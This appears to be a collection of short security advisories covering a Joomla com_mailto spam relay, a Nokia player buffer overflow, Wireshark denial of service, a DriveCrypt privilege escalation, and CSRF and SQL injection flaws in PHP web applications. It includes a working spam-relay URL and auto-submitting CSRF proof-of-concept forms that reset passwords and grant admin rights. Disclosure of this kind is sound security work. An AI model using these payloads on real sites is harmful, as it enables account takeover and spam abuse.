Joomla! 1.5.22 & 1.6.0 both allow spam email to be relayed to unsuspecting victims via the core com_mailto component. Tested using the following URL: http://localhost/j/index.php?option=com_mailto&tmpl=component&template=beez_20&link=aHR0cDovL2xvY2FsaG9zdC9qL2luZGV4LnBocD94PXkgSGFpIEkgYW0gYSBzcGFtIG1lc3NhZ2UhIFdvdWxkIHlvdSBsaWtlIHRvIGJ1eSBhbGwgc29ydHMgb2YgZmFrZSBzdHVmZj8gU1BBTSBTUEFNIFNQQU0= where parameter 'link' is the base64_encoded string: http://localhost/j/index.php?x=y Hai I am a spam message! Would you like to buy all sorts of fake stuff? SPAM SPAM SPAM. This is important as the domain at the beginning must match the domain being relayed against.
A buffer overflow vulnerability exists in Nokia Multimedia Player 1.00.55.5010 due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. The vulnerability is due to a stack-based buffer overflow in the application when handling a specially crafted .NPL file. An attacker can exploit this vulnerability by enticing a user to open a specially crafted .NPL file.
Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer. PoC code is provided in the text.
Wireshark is prone to a remote denial-of-service vulnerability because it fails to properly handle certain types of packets. Attackers can exploit this issue to cause the application to enter an infinite loop which may cause denial-of-service conditions.
This exploit is a local privilege escalation vulnerability in DriveCrypt <= 5.3. It allows an attacker to gain SYSTEM privileges on the vulnerable system. The exploit works by switching the token of the current process with the token of the SYSTEM process. It is tested on DCR.sys and works on Windows XP and Windows 2003.
The vulnerability exists due to failure in the "modules/user/user.admin.php" script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. Attacker can use browser to exploit this vulnerability.
The vulnerability exists due to failure in the "modules/user/user.admin.php" script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. Attacker can use browser to exploit this vulnerability. The following PoC is available: <form action="http://host/admin/index.php?module=user&task=save&elmid=" method="post" name="main"><input type="hidden" name="id" value="USERID"><input type="hidden" name="module" value="100"><input type="hidden" name="newpass1" value="newpass"><input type="hidden" name="newpass2" value="newpass"><input type="hidden" name="email" value="email@example.com"><input type="hidden" name="usertype_id" value="2"></form><script>document.main.submit();</script>
The vulnerability exists due to failure in the "http://host/admin/usersite/save2/" script to properly verify the source of HTTP request and to properly sanitize user-supplied input. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. Attacker can use browser to exploit this vulnerability.
The vulnerability exists due to failure in the "admin/accounting.php" script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. Attacker can use browser to exploit this vulnerability. The following PoC is available. Change user status: <form action="http://host/admin/customers.php?page=1&cID=USERID&action=statusconfirm" method="post" name="main"><input type="hidden" name="status" value="0"></form><script>document.main.submit();</script> Change user permissions: <form action="http://host/admin/accounting.php?cID=USERID&action=save" method="post" name="main" enctype="multipart/form-data"><input type="hidden" name="access[]" value="configuration"><input type="hidden" name="access[]" value="modules"><input type="hidden" name="access[]" value="customers"><input type="hidden" name="access[]" value="start"><input type="hidden" name="access[]" value="content_manager"><input type="hidden" name="access[]" value="categories"></form><script>document.main.submit();</script>
The vulnerability exists due to failure in the 'core/modules/shop/components/ProductList.class.php' script to properly sanitize user-supplied input in 'product' variable. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database. The vulnerability also exists due to failure in the 'core/modules/shop/components/Order.class.php', 'core/modules/shop/components/ParamValuesEditor.class.php' scripts, it's possible to generate an error that will reveal the full path of the script. A remote user can determine the full path to the web root directory and other potentially sensitive information. The vulnerability also exists due to failure in the 'core/modules/user/components/UserEditor.class.php' script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
Services By CQR